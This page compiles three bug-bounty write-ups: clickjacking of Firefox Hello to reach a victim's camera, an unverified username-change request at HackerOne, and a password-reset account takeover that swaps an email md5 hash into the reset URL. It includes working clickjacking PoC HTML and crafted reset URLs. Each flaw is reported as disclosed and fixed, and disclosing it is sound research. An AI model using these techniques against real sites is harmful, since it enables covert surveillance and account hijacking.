Clickjacking in Firefox Hello

Clickjacking, the art of tricking users into clicking on links or buttons that no sane person would ever click on. But how much damage can you do by stealing a few clicks? We are in 2015, we might think that this kind of vulnerabilities would have been solved by now. But that’s not the case.

Firefox Hello

Recently Mozilla launched Firefox Hello, their free service for video and voice conversations online. After a few tests, I noticed that hello.firefox.com website does not prevent framing.

I also noticed that to invite a friend to a conversation, one must send him a link like

https://hello.firefox.com/conversationToken . The friend will have to:
1. access the link;
2. click on the “Join the conversation” button;
3. allow hello.firefox.com to use the camera and microphone.

Chances are that a person who uses hello.firefox.com a lot will allow the website to use his microphone and camera anytime, so he won’t have to go through step 3 every time. The problem is that https://hello.firefox.com/conversationToken can be loaded into an iframe and the second step can be bypassed by clickjacking. In these conditions, an attacker could gain access to a victim’s camera and microphone by using only the trust that the victim has in hello.firefox.com (the trust to give this website access to its camera and microphone anytime).

Step-by-step attack scenario

1. Brandon is the attacker, an evil person. Andreea is the target, a person that uses hello.firefox.com to chat with her friends and is naive enough to trust the website by allowing it to access the camera and microphone anytime;

2. Brandon creates a conversation on hello.firefox.com and obtains a link to invite his “friends” to chat: https://hello.firefox.com/HxfymOMuLX4 ;

3. Brandon integrates the link into a clickjacking attack. He is not a very skilled programmer, but he manages to obtain a working example that he uploads to hiswebsite ;

4. Using facebook or whatever, Brandon sends the above link to George because “he wants to show him a cute kitten”;

5. Andreea visits the target website because she loves kittens. While wishing very much that she’d be able to pet that wonder, she makes one simple click anywhere on the page (left-click, nothing special);

6. Because the “Join the conversation” button fromhttps://hello.firefox.com/HxfymOMuLX4 was positioned under the mouse and Andreea allowed hello.firefox.com to use her camera and microphone anytime, now Brandon has access to his target’s microphone and camera. Good job Brandon!

7. Andreea might notice that her camera and microphone are used, but it is still too late: probably a picture with her leaked to who-knows-who. And she was wearing her favorite pokemon t-shirt. Oh God. If she hasn’t noticed that she is recorded… I don’t want to think about this!

<html>
	<head>
	<title>Security Cat</title>
	<script>
	document.addEventListener('mousemove', function(e){
	document.getElementById('click').style.left = e.clientX || e.pageX;
	document.getElementById('click').style.top = e.clientY || e.pageY
	}, false);
	</script>
	</head>
	<body style="margin:0px;padding:0px;overflow:hidden">
	<img src="http://www.nose2tail.co.uk/cat-matlock-derbyshire.jpg" />
	<iframe id="click" frameborder="0" scrolling="no" style="overflow:none;height:30px;width:120px;opacity:0 ;position:absolute;top:0px;left:0px;margin-top:-15px;margin-left:-75px"
	src='https://hello.firefox.com/HxfymOMuLX4'>
	</iframe>
	</body>
	</html>

Bug report

I’ve reported this vulnerability to Mozilla and they acted great about it. In about 24 hours they acknowledged the problem, came out with a fix, tested it and pushed it into production. From my experience with bug reports, I can say that solving a newly reported bug in this time frame is the absolute record. Way to go guys!

Oh, and they were kind enough to acknowledge the bug with a rather huge bounty. Thank you!

تابع القراءة ←

HACKERONE USERNAME CHANGE EXPLOIT |SOCIAL ENGINEERING|

in this write up I will be explaining the exploit method that I used to perform an unauthorized username change on any Hackerone account. It was an internal system flaw without any email verification which allowed me to carry out the successful attack.

As we all know that Hackerone is one of them best and most controversial Managed bug bounty program website on the internet. And everyday researchers from all around the world test their custom exploit on the corporate applications that are sponsored by Vendors and companies.

Does Social Engineering count?

It is often seen that web application vendors and companies do not educate their employees and staff regarding social engineering attacks. Most of the time policies are not defined to counter the situations. Similarly due to a simple flaw in the Hackerone internal flow I was able to discover a way to change the username of any account on Hackerone.

How Hackerone handled Username Changes?

For all those who have been using Hackerone for a few months must know that Hackerone had a email request mechanism to change the Usernames of profiles. For example if a User had to change his username. He would have to email at support@hackerone.com to generate the email change request, which would be reviewed and then he would be granted a new username

How Hackerone email verification system failed and Exploit?

Basically Hackerone guys email process flow was the cause of this whole attack. The exploit scenario was very simple. The Hackerone email management system had no verification, which was due to two reasons.

•  From which address the email change request was being generated.
•  The address that is requesting the email change is associated with the account or not.
  So generating an attack scenario out of this was relatively easy
• Victim has an account victim@gmail.com with the username victim
• Attacker mails from attacker@gmail.com to change the username of the account (Usernames are visible to everyone on Hackerone)
• Attacker confirms the change from his own email without any prompt to the original user
  And the username is changed.
  I created two emails and made attached one with a Hackerone account with the username: yhunterz
  I carried out the exploit from the other test email which was not associated with the email that had the username because I had a gut feeling that the system does not verify the email of the Username change request.

Social Engineering Email

As expected I was not asked for any confirmation or my email address was checked to be valid for the Username change. Just a verbal confirmation .

And within a time span of 24 hours the Username was changed.

I reported the issue to hackerone just after completing the procedure and carrying out the exploit. And they were very quick to define policies in their email management system to check for associated email address as a patch for the issue.

For the issue they rewarded me a considerable amount as a reward and a place in their eternal hall of fame. I am thankful to hackerone for this honor and I continuously look for issues to report to them that help in enhancement of their security controls.
Do post your comments about this Writeup. And provide suggestions for our next write-ups from our Advisories page.

Until the next writeup. Stay safe and Hack ON!

تابع القراءة ←

Account Takeover Using Password Reset Vulnerability

Account Takeover Using Password Reset Functionality

---------------------------------------

While researching and working on bug bounties I have found that by using Password Reset Functionality, Token & Link we can Takeover all the users account of a website if that site is vulnerable to this type of attack.

Using this vulnerability the attacker can modify the email md5 hash to any victims email md5 hash to change their password and in this way he can also reset all passwords of all the accounts and can successfully compromise the victims account as the password reset link sent to the user includes the email address md5 hash and also the password reset token can be used for other users. 

Steps to Execute the Attack:

There was a precondition that an attacker shall now the victims email id md5 hash value.

Attackers Email ID: attackeremailid@gmail.com and his password reset link:

http://testsite.com/reset-password/74o4s384549484c4k4v506t4d5a3e5n5k444j4g5j4o4c553l454h464m474/74q55426l4q5u5m5c4s5l5m5n5t2102fadb4bd021805624f06ea4c8e4d38

The 1st part in the password reset Url before '/' is password reset token and the second part is the md5 hash of the users email id in which the 1st 28 values (74q55426l4q5u5m5c4s5l5m5n5t2) are same for each users email ids and the remaining last values were different for each users email id as they were the users email id md5 hash value. So, the attacker can decrypt the email hash values easily using the online available md5 encrypters and decrypters like: http://md5decryption.com also sometimes some websites use base 64 encoding(or other encodings) which can also be easily decrypted using the online available base64 encoders and decoders like: http://ostermiller.org/calc/encode.html.

Attackers Email ID: attackeremailid@gmail.com md5 hash value:

102fadb4bd021805624f06ea4c8e4d38

Victims Email ID: victimemailid@gmail.com md5 hash value:

05ebb8fb6ec39f50d33e19cd5719084d

1st 28 values which is same for each users email id hash:
74q55426l4q5u5m5c4s5l5m5n5t2

Crafted Url to Reset the password of the Victims Email ID(i.e account)victimemailid@gmail.com:
http://testsite.com/reset-
password/74o4s384549484c4k4v506t4d5a3e5n5k444j4g5j4o4c553l454h464m474/74q55426l4q5u5m5c4s5l5m5n5t205ebb8fb6ec39f50d33e19cd5719084d

So in this way the attacker can Takeover on any users account.

                                       

Impact: 

The token generated for the activation link isn’t re-checked and no validation is done for associated emailID field, allowing an attacker to change the value to a known email address md5 hash value and reset their password. This provides a trivial route for an attacker to gain access to accounts or cause a  denial of service to users on the Application.

Recommendation: 

Input from the user should be treated as untrusted and re-validated when sent to the server. The recommended approach is to generate a onetime token which is linked to the user account, this can be passed with the onetime random token instead of the email ID hash value and expired once the password has been reset. Additionally, ensure if the identifier is not passed that this won’t default to updating all accounts.

So in this way one can Takeover on the victims accounts using the Password Reset Functionality, Token & Link also this way can be used to find same type of vulnerabilities on different websites.

Suggestions and Feedbacks are welcome.

تابع القراءة ←